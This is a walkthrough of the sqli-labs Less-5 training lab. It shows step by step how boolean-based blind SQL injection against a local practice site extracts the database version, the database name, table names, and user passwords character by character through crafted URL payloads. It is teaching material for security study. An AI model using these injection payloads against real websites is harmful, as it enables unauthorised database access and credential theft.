Less-3 and Less-4 are roughly the same as Less-1 and Less-2, so I will not write them up.
Next comes the first way of doing Less-5.
1. Target site:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1
When id=1 is passed, the page prints only "You are in..." and nothing else. Less-5 never echoes query results, only whether the query returned a row, which is why everything below works from true/false responses.
2. Find the injection point:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' returns an error
Entering the URL above produces a MySQL error; the error message (the part marked by the arrows in the screenshot) shows that the 1' was carried straight into the database query, so there is an injection point.
3. Check the version:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(version(),1)=5%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(version(),1)=4%23
returns an error, so the MySQL major version is 5 (%23 is the URL-encoded # that comments out the rest of the original query).
4. Determine the length of the database name:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=7%23
returns an error
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=8%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=9%23
returns an error
so the database name is 8 characters long
5. Guess the database name, one character at a time:
1> Guess the 1st character
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'a'%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'z'%23
returns an error
so the first character lies between a and z (MySQL's default collation compares case-insensitively, so 'A' and 'a' give the same result). Keep narrowing the range:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'r'%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'s'%23
returns an error
so the first character is s (greater than r, but not greater than s)
2> Guess the 2nd character
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sa'%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sz'%23
returns an error
so the second character lies between a and z
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sd'%23
returns normally
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'se'%23
returns an error
so the second character is e
Continue in the same way up to the 8th character: the database name is security
6. Guess the tables in the database (security):
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit a,1),b,1))>n%23
Description:
a is the table index, counting from 0; b is the character position within the table name, counting from 1; n is the decimal ASCII code to compare against. Raise n one step at a time: the first n for which the page returns an error is the code of that character.
7. Guess the users:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M limit A,1),B,1))=N%23
where S is the database name; M is the table name; A is the user index (from 0); B is the character position (from 1); N is the decimal ASCII code being tested. ifnull(...,0x20) substitutes a space when the column is NULL, so a NULL row cannot make the comparison silently fail.
8. Guess the users and passwords:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M order by id limit A,1),B,1))=N%23
where S is the database name; M is the table name; A is the user index; B is the character position; N is the decimal ASCII code. The order by id fixes the row order so that A always refers to the same user; substitute password for username to read the password column the same way.
Example: http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(password as char),0x20) from security.users order by id limit 0,1),1,1))=68%23
If this returns normally, the first character of the first user's password has ASCII code 68, i.e. D.
Appendix:
substr(): extracts a substring, substr(str, pos, len); the ascii(substr(...)) form in step 6 and the ord(mid(...)) form in steps 7 and 8 are interchangeable.
ord(): returns the code of the leftmost character of its argument. Example: ord('a') is the position of a in the ASCII table, 97; ord('b') is 98.
mid(): substring function
Syntax: mid(string, start position, number of characters)
Example
b6 = '123456789abcdef'; mid(b6,1,13) returns '123456789abcd'
ifnull(expr1, expr2)
If expr1 is not NULL, ifnull() returns expr1; otherwise it returns expr2.
cast() function:
Reference blog: http://www.studyofnet.com/news/109.html
(1) The argument to CAST() is an expression made up of the source value and the target data type, separated by the AS keyword. The following example converts the text string '12' to an integer:
SELECT CAST('12' AS int)
(2) The return value is the integer 12. What happens if you try to convert a string that represents a decimal to an integer?
SELECT CAST('12.5' AS int)
(3) Neither CAST() nor CONVERT() performs rounding or truncation. Since 12.5 cannot be represented by an int data type, this call produces an error.
Note that the CAST examples above are SQL Server syntax. MySQL, which sqli-labs runs on, has no int target type for CAST; the equivalent is CAST('12.5' AS SIGNED), which returns 12 with a truncation warning rather than an error. In the injection payloads, CAST(... AS CHAR) is only there to make sure the column is compared as a string.
Sqli-labs-master Less-5 Double Query - Single Quotes: Way One